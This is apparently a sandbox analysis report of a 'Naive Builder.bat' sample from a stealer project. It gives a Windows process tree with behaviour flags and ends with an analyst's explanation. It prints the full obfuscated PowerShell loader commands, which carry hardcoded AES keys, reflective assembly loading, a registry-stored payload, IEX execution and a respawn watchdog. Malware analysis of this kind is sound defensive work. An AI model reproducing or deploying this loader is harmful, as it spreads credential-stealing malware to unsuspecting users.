- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
  PID: 1200
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  PID: 1272
  - [2] C:\Windows\system32\taskhostw.exe
    Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID: 3232
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
  PID: 1320
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
  PID: 1344
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
  PID: 1360
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
  PID: 1524
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
  PID: 1568
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID: 1596
  - [2] C:\Windows\system32\sihost.exe
    Command line: sihost.exe
    PID: 3092
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
  PID: 1688
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
  PID: 1732
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
  PID: 1796
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1840
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1976
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
  PID: 1984
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID: 1992
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
  PID: 1036
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
  PID: 1208
- [1] C:\Windows\System32\spoolsv.exe
  Command line: C:\Windows\System32\spoolsv.exe
  PID: 2116
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  PID: 2216
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  - Suspicious use of AdjustPrivilegeToken
  PID: 2332
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
  PID: 2452
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
  PID: 2504
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
  PID: 2512
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
  PID: 2620
- [1] C:\Windows\sysmon.exe
  Command line: C:\Windows\sysmon.exe
  PID: 2724
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken
  PID: 2740
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
  PID: 2756
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
  PID: 2776
- [1] C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 2832
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  PID: 3140
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
  PID: 3372
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  PID: 3596
- [1] C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Suspicious use of UnmapMainImage
  PID: 3636
  - [2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID: 4584
    - [3] C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 2828
    - [3] C:\Windows\system32\net.exe
      Command line: net session
      - Suspicious use of WriteProcessMemory
      PID: 3808
      - [4] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 session
        PID: 1252
-
C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='); $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg=='); $XhpAT=$XURkq.CreateDecryptor(); $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length); $XhpAT.Dispose(); $XURkq.Dispose(); $return_var;}function hLEOv($luVLu){ $SBbXV=New-Object System.IO.MemoryStream(,$luVLu); $RlXKT=New-Object System.IO.MemoryStream; $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress); $XPinw.CopyTo($RlXKT); $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose(); $RlXKT.ToArray();}function tzqfR($luVLu,$MCcIJ){ $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu); $cUkGe=$VEHZu.EntryPoint; $cUkGe.Invoke($null, $MCcIJ);}$flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}$YrvSK=[string[]]$TRCCB.Split('\');$xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));$vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = 
[Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3288).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = 
$rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = 
[Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
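The two command lines above spell out the loader end to end. Stage 1 ("Naive Builder.bat.exe", invoked with PowerShell syntax: -noprofile -windowstyle hidden -ep bypass -command) re-reads its own .bat, takes the first line beginning with ":: ", skips four characters, splits the remainder on "\" and turns each half into a .NET assembly via Base64 -> AES-CBC/PKCS7 (32-byte key, 16-byte IV hardcoded in the command line) -> GZip -> [System.Reflection.Assembly]::Load -> EntryPoint.Invoke. Every .NET member name is spelled backwards and reversed at run time ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String). Stage 2 ($sxr-powershell.exe, PID 3288) uses a second key/IV, first to decrypt a dozen short string constants (the registry hive, method and value names it then reads from, the process name for its single-instance check, the member names it resolves dynamically, and a PowerShell fragment it pipes to IEX), then to decode a payload stored in that registry value. The third instance waits for PID 3288 to exit, sleeps five seconds and runs the same code again, a respawn watchdog.

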